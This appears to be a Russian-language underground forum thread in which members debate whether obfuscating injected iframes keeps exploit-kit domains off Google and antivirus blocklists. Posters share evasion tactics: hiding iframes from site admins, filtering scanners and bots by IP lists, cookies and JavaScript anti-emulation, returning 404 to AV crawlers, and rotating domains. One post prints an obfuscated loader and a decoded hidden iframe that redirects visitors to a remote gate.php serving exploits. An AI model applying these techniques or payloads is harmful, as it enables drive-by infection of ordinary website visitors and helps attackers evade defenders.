• XSS.stack #1 – первый литературный журнал от юзеров форума

Спасет ли крипт ифрейма от бана гуглем и(или) АВ?

Отслеживать
salatin

salatin

HDD-drive
Пользователь
Регистрация
25.07.2010
Сообщения
33
Реакции
0
Уважаемые форумчане, собственно назрел такой вопрос, спасет ли крипт ифрейма от бана домена гуглем и(или) АВ?
Если нет, то к чему вообще его криптуют?

P.S. не судите строго если ошибся разделом, вроде как к криптографии относится сабж.
 
его криптуют для того, что бы:
1. админ не сразу нашел
2. Хороший крипт некоторое время может защищать от низкокачественных поисковиков малвари.
3. Крипт усложняет поиск и написание абузы на сам домен. т.к. рядовой пользователь (админ-лох) не сможет понять что за домен скрывается под криптом.

Некоторые умельцы в сам ифрэйм зашивают большое количество проверок. Например, включен ли у пользователя js. Если нет - то такой пользователь на связке не нужен, или если рефер один из поисковиков - то ему ничего не выдаем и т.д. Ну и при нормальном крипте можно несколько уменьшить размер большого ифрэйма с проверками.
 
"Криптование" ифрейма бесполезное и глупое занятие.
Действительно, если ты не умеешь его делать сам :)

На самом же деле "крипт" фрейма - дело очень непростое, то есть тупо закрыть урл от просмотра в сорце страницы это одно дело (как впрочем и от работы проактивной защиты), а вот по максимуму усложнить жизнь админу при реверсе урла - тут надо и мозгами раскинуть. Надо и поисковые боты отсеивать и попытки повторного просмотра и отстуствие поддержки js.
Умеючи спалить можно все, но по статистике лохов в сети 99.9% обидно как то даже...
 
Действительно, если ты не умеешь его делать сам smile.gif

Не беспокойся, умею, у меня есть свой непалящийся обфускатор HTML/JS.

по максимуму усложнить жизнь админу при реверсе урла - тут надо и мозгами раскинуть.

Пораскинь мозгом и осознай ненужность сего занятия.

Надо и поисковые боты отсеивать и попытки повторного просмотра и отстуствие поддержки js.

Это не имеет никакого отношения к "криптованию" ифрейма.
 
Это не имеет никакого отношения к "криптованию" ифрейма.

Это имеет прямое отношение. Давно прошли времена тупых сниферов, тупых ифрэймов и т.д. по списку.

Мы давно должны были думать дальше и глубже. Зачем лишний раз палиться? Зачем лишний раз покупать свежие домены? Этого можно частично избежать более продвинутыми ифрэймами. И их юзать нужно было начинать еще в бородатом 2006 году. А большинство народу по старинке работают и не желают воспринимать что-то новое. И в этом проблема заплывших мозгов и шаблонных решений.

Да, такие ифрэймы "толстеют" на глазах. И для этого, как раз, я и предлагаю использовать крипт с функами сжатия данных.
 
Ar3s, ты либо не в теме, либо чего-то не допонимаешь. Попробую объяснить:

его криптуют для того, что бы:
1. админ не сразу нашел
Ты правда думаешь что админы не могут найти набор кала вроде:
var O0OIOOOI0OI00O1I = 21 + IIl00lI0OO0000ll; for(var I0OII0OIO0lII01l=0;I0OII0OIO0lII01l<l1O01I11lOO111ll.length;I0OII0OIO0lII01l++)
{ O0l1lI10OIO10lI0 = lOlOO1l1lI01l0Il(l1O01I11lOO111ll,I0OII0OIO0lII01l) - II0OIIO01I11l011; if (O0l1lI10OIO10lI0 >= 0 && O0l1lI10OIO10lI0<=(O0OIOOOI0OI00O1I-1))
{ if (O10OlOlI010OIlOI){ l1l0010O0Il0OI0l = O0l1lI10OIO10lI0 * O0OIOOOI0OI00O1I; } else { l1l0010O0Il0OI0l += O0l1lI10OIO10lI0; O11lI0IlOI10IIIl += lI10OO0O010l10lI(l1l0010O0Il0OI0l ^ IIl00lI0OO0000ll);
l1l0010O0Il0OI0l = 0; } O10OlOlI010OIlOI = !O10OlOlI010OIlOI; } } Il111Ol1Il1l00I0(O11lI0IlOI10IIIl);
?

2. Хороший крипт некоторое время может защищать от низкокачественных поисковиков малвари.
Низкокачественные - это что? Которые не умеют интерпретировать Javascript? Так они и не влияют ни на что. А те, которые умеют - криптуй или не криптуй - всё равно узнают домен. Но ботов все равно можно зарубить, я это и делаю. Есть механизмы антиэмуляции javascript, которые достаточно успешно определяют бота. Но это не имеет отношения к криптованию ифрейма или чего-то другого. В моём трафе всех ботов рубит антибот-механизм: списки IP, работа с куками и работа с JS, только потом сервер выдаёт iframe на связку. Но домены все равно палятся, как не крути, вне зависимости от наличия "криптования" или без него, так как на них заходит юзер, а значит - его антивирус, его фаервол и Google Toolbar, вшитый в его Firefox, который отправляет данные куда надо и проверяющий механизм аверов все равно приходит на связку и рано ли поздно палит то что она выдаёт эксплойты, если спалился крипт связки или у нее плохой антибот-механизм или аверы делают это с полноценных виртуалок (скорее всего так и есть). Поэтому меняют домены, кто раз в день, кто раз в час, до попадания домена в блеклисты.
Имеет смысл говорить только об обфускации связки, а не ифреймов.

3. Крипт усложняет поиск и написание абузы на сам домен. т.к. рядовой пользователь (админ-лох) не сможет понять что за домен скрывается под криптом.

Жизнь домена на порядок меньше, чем дата его абузенья. Я не знаю может домены co.cc которые все юзают по 50$ за 1000 штук имеют для тебя большую ценность, но когда начнешь лить приличное количество трафа хотя бы от миллиона в месяц, то поймешь что ценности в этом деле домен не имеет.
 
Но ботов все равно можно зарубить, я это и делаю. Есть механизмы антиэмуляции javascript, которые достаточно успешно определяют бота. Но это не имеет отношения к криптованию ифрейма или чего-то другого. В моём трафе всех ботов рубит антибот-механизм: списки IP, работа с куками и работа с JS, только потом сервер выдаёт iframe на связку.
И ты благополучно палишь свой мега анти бот при этом так выходит, если ставишь на него чистый фрейм :)

Вообще говоря идея микросвязок решает это вопрос раз и на всегда, только или никто так и не может поднять свой зад и реализовать или же давно реализовал и молчит в тряпочку :)
 
1.
Ты правда думаешь что админы не могут найти набор кала вроде:

link
Специально для тебя. Скажи, здесь легко найти мой код?


2.
А те, которые умеют - криптуй или не криптуй - всё равно узнают домен.

Этого можно частично избежать более продвинутыми ифрэймами.

Так что здесь и да и нет. Это противоборство двух сторон. У меня есть более 1К ip которые занимаются ловлей.

и проверяющий механизм аверов все равно приходит на связку и рано ли поздно палит то что она выдаёт эксплойты
Ко мне приходит и получает 404 по любому запросу. Те же ip стоят на фаерволе.

Я не знаю может домены co.cc которые все юзают по 50$ за 1000 штук имеют для тебя большую ценность, но когда начнешь лить приличное количество трафа хотя бы от миллиона в месяц, то поймешь что ценности в этом деле домен не имеет.

Как ты думаешь, для salatin реально такое количество трафа на этом этапе?

p.s. Хотя ты прав в одном 100%. Все что мы здесь обсуждаем изрядно выходит за рамки простого крипта.
 
TrueUser

Вообще говоря идея микросвязок решает это вопрос раз и на всегда, только или никто так и не может поднять свой зад и реализовать или же давно реализовал и молчит в тряпочку smile.gif

Человек который взялся за реализацию этой идеи есть на нашем форуме. И даже в этом топе :)
 
Специально для Mr.Bogus. Скажи, здесь легко найти мой код?
Фрейм стоит на связку с 0-дей сплоитами :D
Скрипт(кодес не привожу) в итоге выдает фрейм:
Код: 
<style>.Cbb{display:none;}</style><iframe src='/Cbb.html' class='Cbb' onload='this.onload="";this.src="http://xss.pro/adm/gate.php";'></iframe>
PS:Лихо раскидано и обфусцыровано, но разобрать не проблема, кагбе нет всяких антиотладок итд, но для простого админа это будет сложно=)

[mod][Ar3s] Ну в том что ты найдешь - я нисколько не сомневался.
p.s. чуть поднял хайд. Метод не совсем заезженный.[/mod]
 
Вообще говоря идея микросвязок решает это вопрос раз и на всегда, только или никто так и не может поднять свой зад и реализовать или же давно реализовал и молчит в тряпочку
А в чем суть идеи, можешь в кратце рассказать?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх